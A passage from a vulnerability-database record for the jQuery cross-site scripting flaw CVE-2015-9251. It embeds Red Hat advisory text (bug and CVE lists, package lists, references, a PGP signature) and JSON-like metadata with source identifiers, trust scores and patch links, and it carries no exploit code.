also be emphasized\n1810154 - RFE: ipa-backup should compare locally and globally installed server roles\n1810179 - ipa-client-install should name authselect backups and restore to that at uninstall time\n1813330 - ipa-restore does not restart httpd\n1816784 - KRA install fails if all KRA members are Hidden Replicas\n1818765 - [Rebase] Rebase ipa to 4.8.6+\n1818877 - [Rebase] Rebase to softhsm 2.6.0+\n1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method\n1831732 - AVC avc: denied { dac_override } for comm=\"ods-enforcerd\n1831935 - AD authentication with IdM against SQL Server\n1832331 - [abrt] [faf] 389-ds-base: unknown function(): /usr/sbin/ns-slapd killed by 11\n1833266 - [dirsrv] set 'nsslapd-enable-upgrade-hash: off' as this raises warnings\n1834264 - BIND rebase: rebuild against new so version\n1834909 - softhsm use-after-free on process exit\n1845211 - Rebase bind-dyndb-ldap to 11.3\n1845537 - IPA bind configuration issue\n1845596 - ipa trust-add fails with 'Fetching domains from trusted forest failed'\n1846352 - cannot issue certs with multiple IP addresses corresponding to different hosts\n1846434 - Remove ipa-idoverride-memberof as superceded by ipa-server 4.8.7\n1847999 - EPN does not ship its default configuration ( /etc/ipa/epn.conf ) in freeipa-client-epn\n1849914 - FreeIPA - Utilize 256-bit AJP connector passwords\n1851411 - ipa: typo issue in ipanthomedirectoryrive deffinition\n1852244 - ipa-healthcheck inadvertently obsoleted in RHEL 8.2\n1853263 - ipa-selinux package missing\n1857157 - replica install failing with avc denial for custodia component\n1858318 - AttributeError: module 'ssl' has no attribute 'SSLCertVerificationError' when upgrading ca-less ipa master\n1859213 - AVC denial during ipa-adtrust-install --add-agents\n1863079 - ipa-epn command displays 'exception: ConnectionRefusedError: [Errno 111] Connection refused'\n1863616 - CA-less install does not set required permissions on KDC 
certificate\n1866291 - EPN: enhance input validation\n1866938 - ipa-epn fails to retrieve user data if some user attributes are not present\n1868432 - Unhandled Python exception in '/usr/libexec/ipa/ipa-pki-retrieve-key'\n1869311 - ipa trust-add fails with 'Fetching domains from trusted forest failed'\n1870202 - File permissions of /etc/ipa/ca.crt differ between CA-ful and CA-less\n1874015 - ipa hbacrule-add-service --hbacsvcs=sshd is not applied successfully for subdomain\n1875348 - Valgrind reports a memory leak in the Schema Compatibility plugin. \n1879604 - pkispawn logs files are empty\n\n6. Package List:\n\nRed Hat Enterprise Linux AppStream (v. 8):\n\nSource:\nbind-dyndb-ldap-11.3-1.module+el8.3.0+6993+104f8db0.src.rpm\ncustodia-0.6.0-3.module+el8.1.0+4098+f286395e.src.rpm\nipa-4.8.7-12.module+el8.3.0+8222+c1bff54a.src.rpm\nipa-4.8.7-12.module+el8.3.0+8223+6212645f.src.rpm\nipa-healthcheck-0.4-6.module+el8.3.0+7710+e2408ce4.src.rpm\nipa-healthcheck-0.4-6.module+el8.3.0+7711+c4441980.src.rpm\nopendnssec-2.1.6-2.module+el8.3.0+6580+328a3362.src.rpm\npython-jwcrypto-0.5.0-1.module+el8.1.0+4098+f286395e.src.rpm\npython-jwcrypto-0.5.0-1.module+el8.1.0+4107+4a66eb87.src.rpm\npython-kdcproxy-0.4-5.module+el8.2.0+4691+a05b2456.src.rpm\npython-qrcode-5.1-12.module+el8.1.0+4098+f286395e.src.rpm\npython-qrcode-5.1-12.module+el8.1.0+4107+4a66eb87.src.rpm\npython-yubico-1.3.2-9.module+el8.1.0+4098+f286395e.src.rpm\npython-yubico-1.3.2-9.module+el8.1.0+4107+4a66eb87.src.rpm\npyusb-1.0.0-9.module+el8.1.0+4098+f286395e.src.rpm\npyusb-1.0.0-9.module+el8.1.0+4107+4a66eb87.src.rpm\nslapi-nis-0.56.5-4.module+el8.3.0+8222+c1bff54a.src.rpm\nsofthsm-2.6.0-3.module+el8.3.0+6909+fb33717d.src.rpm\n\naarch64:\nbind-dyndb-ldap-11.3-1.module+el8.3.0+6993+104f8db0.aarch64.rpm\nbind-dyndb-ldap-debuginfo-11.3-1.module+el8.3.0+6993+104f8db0.aarch64.rpm\nbind-dyndb-ldap-debugsource-11.3-1.module+el8.3.0+6993+104f8db0.aarch64.rpm\nipa-client-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm\ni
pa-client-4.8.7-12.module+el8.3.0+8223+6212645f.aarch64.rpm\nipa-client-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm\nipa-client-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.aarch64.rpm\nipa-client-epn-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm\nipa-client-epn-4.8.7-12.module+el8.3.0+8223+6212645f.aarch64.rpm\nipa-client-samba-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm\nipa-client-samba-4.8.7-12.module+el8.3.0+8223+6212645f.aarch64.rpm\nipa-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm\nipa-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.aarch64.rpm\nipa-debugsource-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm\nipa-debugsource-4.8.7-12.module+el8.3.0+8223+6212645f.aarch64.rpm\nipa-server-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm\nipa-server-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm\nipa-server-trust-ad-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm\nipa-server-trust-ad-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm\nopendnssec-2.1.6-2.module+el8.3.0+6580+328a3362.aarch64.rpm\nopendnssec-debuginfo-2.1.6-2.module+el8.3.0+6580+328a3362.aarch64.rpm\nopendnssec-debugsource-2.1.6-2.module+el8.3.0+6580+328a3362.aarch64.rpm\nslapi-nis-0.56.5-4.module+el8.3.0+8222+c1bff54a.aarch64.rpm\nslapi-nis-debuginfo-0.56.5-4.module+el8.3.0+8222+c1bff54a.aarch64.rpm\nslapi-nis-debugsource-0.56.5-4.module+el8.3.0+8222+c1bff54a.aarch64.rpm\nsofthsm-2.6.0-3.module+el8.3.0+6909+fb33717d.aarch64.rpm\nsofthsm-debuginfo-2.6.0-3.module+el8.3.0+6909+fb33717d.aarch64.rpm\nsofthsm-debugsource-2.6.0-3.module+el8.3.0+6909+fb33717d.aarch64.rpm\nsofthsm-devel-2.6.0-3.module+el8.3.0+6909+fb33717d.aarch64.rpm\n\nnoarch:\ncustodia-0.6.0-3.module+el8.1.0+4098+f286395e.noarch.rpm\nipa-client-common-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm\nipa-client-common-4.8.7-12.module+el8.3.0+8223+6212645f.noarch.rpm\nipa-common-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm\nipa-common-4.8.7-12.module+el8.3.0+8223+6
212645f.noarch.rpm\nipa-healthcheck-0.4-6.module+el8.3.0+7710+e2408ce4.noarch.rpm\nipa-healthcheck-core-0.4-6.module+el8.3.0+7710+e2408ce4.noarch.rpm\nipa-healthcheck-core-0.4-6.module+el8.3.0+7711+c4441980.noarch.rpm\nipa-python-compat-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm\nipa-python-compat-4.8.7-12.module+el8.3.0+8223+6212645f.noarch.rpm\nipa-selinux-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm\nipa-selinux-4.8.7-12.module+el8.3.0+8223+6212645f.noarch.rpm\nipa-server-common-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm\nipa-server-dns-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm\npython3-custodia-0.6.0-3.module+el8.1.0+4098+f286395e.noarch.rpm\npython3-ipaclient-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm\npython3-ipaclient-4.8.7-12.module+el8.3.0+8223+6212645f.noarch.rpm\npython3-ipalib-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm\npython3-ipalib-4.8.7-12.module+el8.3.0+8223+6212645f.noarch.rpm\npython3-ipaserver-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm\npython3-jwcrypto-0.5.0-1.module+el8.1.0+4098+f286395e.noarch.rpm\npython3-jwcrypto-0.5.0-1.module+el8.1.0+4107+4a66eb87.noarch.rpm\npython3-kdcproxy-0.4-5.module+el8.2.0+4691+a05b2456.noarch.rpm\npython3-pyusb-1.0.0-9.module+el8.1.0+4098+f286395e.noarch.rpm\npython3-pyusb-1.0.0-9.module+el8.1.0+4107+4a66eb87.noarch.rpm\npython3-qrcode-5.1-12.module+el8.1.0+4098+f286395e.noarch.rpm\npython3-qrcode-5.1-12.module+el8.1.0+4107+4a66eb87.noarch.rpm\npython3-qrcode-core-5.1-12.module+el8.1.0+4098+f286395e.noarch.rpm\npython3-qrcode-core-5.1-12.module+el8.1.0+4107+4a66eb87.noarch.rpm\npython3-yubico-1.3.2-9.module+el8.1.0+4098+f286395e.noarch.rpm\npython3-yubico-1.3.2-9.module+el8.1.0+4107+4a66eb87.noarch.rpm\n\nppc64le:\nbind-dyndb-ldap-11.3-1.module+el8.3.0+6993+104f8db0.ppc64le.rpm\nbind-dyndb-ldap-debuginfo-11.3-1.module+el8.3.0+6993+104f8db0.ppc64le.rpm\nbind-dyndb-ldap-debugsource-11.3-1.module+el8.3.0+6993+104f8db0.ppc64le.rpm\nipa-client-4.8.7-12.module+el8.3.0+8222+c1bff54
a.ppc64le.rpm\nipa-client-4.8.7-12.module+el8.3.0+8223+6212645f.ppc64le.rpm\nipa-client-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm\nipa-client-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.ppc64le.rpm\nipa-client-epn-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm\nipa-client-epn-4.8.7-12.module+el8.3.0+8223+6212645f.ppc64le.rpm\nipa-client-samba-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm\nipa-client-samba-4.8.7-12.module+el8.3.0+8223+6212645f.ppc64le.rpm\nipa-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm\nipa-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.ppc64le.rpm\nipa-debugsource-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm\nipa-debugsource-4.8.7-12.module+el8.3.0+8223+6212645f.ppc64le.rpm\nipa-server-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm\nipa-server-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm\nipa-server-trust-ad-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm\nipa-server-trust-ad-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm\nopendnssec-2.1.6-2.module+el8.3.0+6580+328a3362.ppc64le.rpm\nopendnssec-debuginfo-2.1.6-2.module+el8.3.0+6580+328a3362.ppc64le.rpm\nopendnssec-debugsource-2.1.6-2.module+el8.3.0+6580+328a3362.ppc64le.rpm\nslapi-nis-0.56.5-4.module+el8.3.0+8222+c1bff54a.ppc64le.rpm\nslapi-nis-debuginfo-0.56.5-4.module+el8.3.0+8222+c1bff54a.ppc64le.rpm\nslapi-nis-debugsource-0.56.5-4.module+el8.3.0+8222+c1bff54a.ppc64le.rpm\nsofthsm-2.6.0-3.module+el8.3.0+6909+fb33717d.ppc64le.rpm\nsofthsm-debuginfo-2.6.0-3.module+el8.3.0+6909+fb33717d.ppc64le.rpm\nsofthsm-debugsource-2.6.0-3.module+el8.3.0+6909+fb33717d.ppc64le.rpm\nsofthsm-devel-2.6.0-3.module+el8.3.0+6909+fb33717d.ppc64le.rpm\n\ns390x:\nbind-dyndb-ldap-11.3-1.module+el8.3.0+6993+104f8db0.s390x.rpm\nbind-dyndb-ldap-debuginfo-11.3-1.module+el8.3.0+6993+104f8db0.s390x.rpm\nbind-dyndb-ldap-debugsource-11.3-1.module+el8.3.0+6993+104f8db0.s390x.rpm\nipa-client-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm\nipa-client
-4.8.7-12.module+el8.3.0+8223+6212645f.s390x.rpm\nipa-client-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm\nipa-client-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.s390x.rpm\nipa-client-epn-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm\nipa-client-epn-4.8.7-12.module+el8.3.0+8223+6212645f.s390x.rpm\nipa-client-samba-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm\nipa-client-samba-4.8.7-12.module+el8.3.0+8223+6212645f.s390x.rpm\nipa-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm\nipa-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.s390x.rpm\nipa-debugsource-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm\nipa-debugsource-4.8.7-12.module+el8.3.0+8223+6212645f.s390x.rpm\nipa-server-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm\nipa-server-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm\nipa-server-trust-ad-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm\nipa-server-trust-ad-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm\nopendnssec-2.1.6-2.module+el8.3.0+6580+328a3362.s390x.rpm\nopendnssec-debuginfo-2.1.6-2.module+el8.3.0+6580+328a3362.s390x.rpm\nopendnssec-debugsource-2.1.6-2.module+el8.3.0+6580+328a3362.s390x.rpm\nslapi-nis-0.56.5-4.module+el8.3.0+8222+c1bff54a.s390x.rpm\nslapi-nis-debuginfo-0.56.5-4.module+el8.3.0+8222+c1bff54a.s390x.rpm\nslapi-nis-debugsource-0.56.5-4.module+el8.3.0+8222+c1bff54a.s390x.rpm\nsofthsm-2.6.0-3.module+el8.3.0+6909+fb33717d.s390x.rpm\nsofthsm-debuginfo-2.6.0-3.module+el8.3.0+6909+fb33717d.s390x.rpm\nsofthsm-debugsource-2.6.0-3.module+el8.3.0+6909+fb33717d.s390x.rpm\nsofthsm-devel-2.6.0-3.module+el8.3.0+6909+fb33717d.s390x.rpm\n\nx86_64:\nbind-dyndb-ldap-11.3-1.module+el8.3.0+6993+104f8db0.x86_64.rpm\nbind-dyndb-ldap-debuginfo-11.3-1.module+el8.3.0+6993+104f8db0.x86_64.rpm\nbind-dyndb-ldap-debugsource-11.3-1.module+el8.3.0+6993+104f8db0.x86_64.rpm\nipa-client-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm\nipa-client-4.8.7-12.module+el8.3.0+8223+6212645f.x86_64.rpm\nipa-client-debuginf
o-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm\nipa-client-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.x86_64.rpm\nipa-client-epn-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm\nipa-client-epn-4.8.7-12.module+el8.3.0+8223+6212645f.x86_64.rpm\nipa-client-samba-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm\nipa-client-samba-4.8.7-12.module+el8.3.0+8223+6212645f.x86_64.rpm\nipa-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm\nipa-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.x86_64.rpm\nipa-debugsource-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm\nipa-debugsource-4.8.7-12.module+el8.3.0+8223+6212645f.x86_64.rpm\nipa-server-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm\nipa-server-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm\nipa-server-trust-ad-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm\nipa-server-trust-ad-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm\nopendnssec-2.1.6-2.module+el8.3.0+6580+328a3362.x86_64.rpm\nopendnssec-debuginfo-2.1.6-2.module+el8.3.0+6580+328a3362.x86_64.rpm\nopendnssec-debugsource-2.1.6-2.module+el8.3.0+6580+328a3362.x86_64.rpm\nslapi-nis-0.56.5-4.module+el8.3.0+8222+c1bff54a.x86_64.rpm\nslapi-nis-debuginfo-0.56.5-4.module+el8.3.0+8222+c1bff54a.x86_64.rpm\nslapi-nis-debugsource-0.56.5-4.module+el8.3.0+8222+c1bff54a.x86_64.rpm\nsofthsm-2.6.0-3.module+el8.3.0+6909+fb33717d.x86_64.rpm\nsofthsm-debuginfo-2.6.0-3.module+el8.3.0+6909+fb33717d.x86_64.rpm\nsofthsm-debugsource-2.6.0-3.module+el8.3.0+6909+fb33717d.x86_64.rpm\nsofthsm-devel-2.6.0-3.module+el8.3.0+6909+fb33717d.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. 
References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-9251\nhttps://access.redhat.com/security/cve/CVE-2016-10735\nhttps://access.redhat.com/security/cve/CVE-2018-14040\nhttps://access.redhat.com/security/cve/CVE-2018-14042\nhttps://access.redhat.com/security/cve/CVE-2018-20676\nhttps://access.redhat.com/security/cve/CVE-2018-20677\nhttps://access.redhat.com/security/cve/CVE-2019-8331\nhttps://access.redhat.com/security/cve/CVE-2019-11358\nhttps://access.redhat.com/security/cve/CVE-2020-1722\nhttps://access.redhat.com/security/cve/CVE-2020-11022\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.3_release_notes/\n\n8. Contact:\n\nThe Red Hat security contact is <secalert@redhat.com>. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2020 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBX6I0xtzjgjWX9erEAQioFw/+IiVoE8tPMkiNgSNrk05OezzG/Cev8wXY\nmTJ+clSxujruzDZ1GyYz5Ua5v4+fwEHbTKVHiite3HKbYGgV9E5H9Y/JVR75rbPN\nmIfAOLmvYDp3JeHT3RBqRrtviz2UaWRTmE8E30EoC0C912w0NHpwS3fhuRmJov1X\nlflTtWlQCuPE/7yFQEZqYYjmKMqAVeDk4K6smM/aTzMyM+uFgaksiSTrLzU0mcHJ\nAAn9h59qlwUXNGRbyBCoLMJrKq5Sw1+xz518XIIjJOQDJbSqu8syzKgi/qSFuLRp\n2c/OSKJ98CVoiCcyhsBW/c3B6eoDmSfeKqt6JwVH/Sva+d7Oj5vpWTB5GW4hDFFh\nt3cuhvyavPnyAzxRnYw5syn/RTyjaOK1U6+6SbEtJVnlx9+FW0lKs/Pcx2ocYmfO\nUCDXHgxmEP8DTKwJZyIZtybVkpqbXh6jf69NLROTTZMtEwJzE1NGG4ulcl6tutTq\nS0gchuiUuxItZlD3a9ISBXXxV0iqqd7I5p78maohzIwfyZR13S++rFt7JnoVb7SO\nDECfEs6VinGH0Z0YInceF6Y9N+SURBrcQpQK12/wtGSChFFU83FII2sxy6iG7pTF\nHPTzByu+aYgFpuEF4EKSrDlZCVJ8Es5lyp+cF401o3oGJuNo9WYScKjb51a0+SLJ\nzbmM3GoiGZI=QyyK\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \nThe purpose of this text-only errata is to inform you about the security\nissues fixed in this release. 
\n\nSecurity Fix(es):\n\n* HTTP/2: flood using PING frames results in unbounded memory growth\n(CVE-2019-9512)\n\n* HTTP/2: flood using PRIORITY frames results in excessive resource\nconsumption (CVE-2019-9513)\n\n* HTTP/2: flood using HEADERS frames results in unbounded memory growth\n(CVE-2019-9514)\n\n* HTTP/2: flood using SETTINGS frames results in unbounded memory growth\n(CVE-2019-9515)\n\n* HTTP/2: 0-length headers lead to denial of service (CVE-2019-9516)\n\n* HTTP/2: request for large response leads to denial of service\n(CVE-2019-9517)\n\n* HTTP/2: flood using empty frames results in excessive resource\nconsumption (CVE-2019-9518)\n\n* infinispan: invokeAccessibly method from ReflectionUtil class allows to\ninvoke private methods (CVE-2019-10174)\n\n* spring-security-core: mishandling of user passwords allows logging in\nwith a password of NULL (CVE-2019-11272)\n\n* jackson-databind: failure to block the logback-core class from\npolymorphic deserialization leading to remote code execution\n(CVE-2019-12384)\n\n* jackson-databind: default typing mishandling leading to remote code\nexecution (CVE-2019-14379)\n\n* xmlrpc: Deserialization of server-side exception from faultCause in\nXMLRPC error response (CVE-2019-17570)\n\n* js-jquery: Cross-site scripting via cross-domain ajax requests\n(CVE-2015-9251)\n\n* logback: Serialization vulnerability in SocketServer and\nServerSocketReceiver (CVE-2017-5929)\n\n* js-jquery: XSS in responses from cross-origin ajax requests\n(CVE-2017-16012)\n\n* apache-commons-compress: ZipArchiveInputStream.read() fails to identify\ncorrect EOF allowing for DoS via crafted zip (CVE-2018-11771)\n\n* spring-data-api: potential information disclosure through maliciously\ncrafted example value in ExampleMatcher (CVE-2019-3802)\n\n* undertow: leak credentials to log files\nUndertowLogger.REQUEST_LOGGER.undertowRequestFailed (CVE-2019-3888)\n\n* shiro: Cookie padding oracle vulnerability with default configuration\n(CVE-2019-12422)\n\n* 
jackson-databind: polymorphic typing issue allows attacker to read\narbitrary local files on the server via crafted JSON message. \n1725807 - CVE-2019-12384 jackson-databind: failure to block the logback-core class from polymorphic deserialization leading to remote code execution\n1728993 - CVE-2019-11272 spring-security-core: mishandling of user passwords allows logging in with a password of NULL\n1730316 - CVE-2019-3802 spring-data-api: potential information disclosure through maliciously crafted example value in ExampleMatcher\n1735645 - CVE-2019-9512 HTTP/2: flood using PING frames results in unbounded memory growth\n1735741 - CVE-2019-9513 HTTP/2: flood using PRIORITY frames results in excessive resource consumption\n1735744 - CVE-2019-9514 HTTP/2: flood using HEADERS frames results in unbounded memory growth\n1735745 - CVE-2019-9515 HTTP/2: flood using SETTINGS frames results in unbounded memory growth\n1735749 - CVE-2019-9518 HTTP/2: flood using empty frames results in excessive resource consumption\n1737517 - CVE-2019-14379 jackson-databind: default typing mishandling leading to remote code execution\n1741864 - CVE-2019-9516 HTTP/2: 0-length headers lead to denial of service\n1741868 - CVE-2019-9517 HTTP/2: request for large response leads to denial of service\n1752962 - CVE-2019-14439 jackson-databind: Polymorphic typing issue related to logback/JNDI\n1774726 - CVE-2019-12422 shiro: Cookie padding oracle vulnerability with default configuration\n1775193 - CVE-2019-17570 xmlrpc: Deserialization of server-side exception from faultCause in XMLRPC error response\n\n5", sources: [ { db: "NVD", id: "CVE-2015-9251", }, { db: "JVNDB", id: "JVNDB-2015-008097", }, { db: "BID", id: "105658", }, { db: "VULHUB", id: "VHN-87212", }, { db: "PACKETSTORM", id: "170819", }, { db: "PACKETSTORM", id: "170823", }, { db: "PACKETSTORM", id: "156315", }, { db: "PACKETSTORM", id: "159876", }, { db: "PACKETSTORM", id: "156941", }, ], trust: 2.43, }, external_ids: { "@context": { 
"@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2015-9251", trust: 3.3, }, { db: "ICS CERT", id: "ICSA-18-212-04", trust: 2.8, }, { db: "BID", id: "105658", trust: 2, }, { db: "PACKETSTORM", id: "153237", trust: 1.7, }, { db: "PACKETSTORM", id: "156743", trust: 1.7, }, { db: "PACKETSTORM", id: "152787", trust: 1.7, }, { db: "TENABLE", id: "TNS-2019-08", trust: 1.7, }, { db: "PULSESECURE", id: "SA44601", trust: 1.7, }, { db: "PACKETSTORM", id: "156315", trust: 0.8, }, { db: "PACKETSTORM", id: "170823", trust: 0.8, }, { db: "PACKETSTORM", id: "156941", trust: 0.8, }, { db: "JVN", id: "JVNVU96012689", trust: 0.8, }, { db: "JVNDB", id: "JVNDB-2015-008097", trust: 0.8, }, { db: "PACKETSTORM", id: "159353", trust: 0.7, }, { db: "PACKETSTORM", id: "159852", trust: 0.7, }, { db: "PACKETSTORM", id: "170821", trust: 0.7, }, { db: "PACKETSTORM", id: "156630", trust: 0.7, }, { db: "CNNVD", id: "CNNVD-201801-798", trust: 0.7, }, { db: "AUSCERT", id: "ESB-2020.1016", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2020.0832", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2023.0585", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2019.3165", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2020.3875", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2019.1238", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2023.0583", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2020.0494", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2022.1512", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2021.1519", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2020.3267", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2019.1299", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2020.1076", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2021.0465", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2020.3902", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2019.4294", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2020.3368", 
trust: 0.6, }, { db: "AUSCERT", id: "ESB-2019.1225", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2021.2525", trust: 0.6, }, { db: "ICS CERT", id: "ICSMA-21-187-01", trust: 0.6, }, { db: "ICS CERT", id: "ICSA-22-097-01", trust: 0.6, }, { db: "PACKETSTORM", id: "170819", trust: 0.2, }, { db: "PACKETSTORM", id: "159876", trust: 0.2, }, { db: "PACKETSTORM", id: "170817", trust: 0.1, }, { db: "SEEBUG", id: "SSVID-98926", trust: 0.1, }, { db: "VULHUB", id: "VHN-87212", trust: 0.1, }, ], sources: [ { db: "VULHUB", id: "VHN-87212", }, { db: "BID", id: "105658", }, { db: "JVNDB", id: "JVNDB-2015-008097", }, { db: "PACKETSTORM", id: "170819", }, { db: "PACKETSTORM", id: "170823", }, { db: "PACKETSTORM", id: "156315", }, { db: "PACKETSTORM", id: "159876", }, { db: "PACKETSTORM", id: "156941", }, { db: "CNNVD", id: "CNNVD-201801-798", }, { db: "NVD", id: "CVE-2015-9251", }, ], }, id: "VAR-201801-0036", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VULHUB", id: "VHN-87212", }, ], trust: 0.01, }, last_update_date: "2024-11-29T22:33:43.707000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "Mitigate possible XSS vulnerability #2588 (c254d30)", trust: 0.8, url: "https://github.com/jquery/jquery/commit/f60729f3903d17917dc351f3ac87794de379b0cc", }, { title: "jQuery Fixes for cross-site scripting vulnerabilities", trust: 0.6, url: "http://123.124.177.30/web/xxk/bdxqById.tag?id=77976", }, ], sources: [ { db: "JVNDB", id: "JVNDB-2015-008097", }, { db: "CNNVD", id: "CNNVD-201801-798", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": 
"https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "CWE-79", trust: 1.1, }, { problemtype: "Cross-site scripting (CWE-79) [NVD Evaluation ]", trust: 0.8, }, ], sources: [ { db: "VULHUB", id: "VHN-87212", }, { db: "JVNDB", id: "JVNDB-2015-008097", }, { db: "NVD", id: "CVE-2015-9251", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 2.9, url: "http://www.securityfocus.com/bid/105658", }, { trust: 2.9, url: "http://packetstormsecurity.com/files/152787/dotcms-5.1.1-vulnerable-dependencies.html", }, { trust: 2.6, url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html", }, { trust: 2.4, url: "https://access.redhat.com/errata/rhsa-2020:0481", }, { trust: 2.3, url: "http://packetstormsecurity.com/files/153237/retirejs-cors-issue-script-execution.html", }, { trust: 2.3, url: "http://packetstormsecurity.com/files/156743/octobercms-insecure-dependencies.html", }, { trust: 2.3, url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { trust: 2, url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { trust: 2, url: "https://github.com/jquery/jquery/commit/f60729f3903d17917dc351f3ac87794de379b0cc", }, { trust: 2, url: "https://github.com/jquery/jquery/pull/2588", }, { trust: 2, url: "https://ics-cert.us-cert.gov/advisories/icsa-18-212-04", }, { trust: 2, url: "https://sw.aveva.com/hubfs/assets-2018/pdf/security-bulletin/securitybulletin_lfsec126.pdf", }, { trust: 2, url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { trust: 2, url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { trust: 1.7, url: "https://seclists.org/bugtraq/2019/may/18", }, { 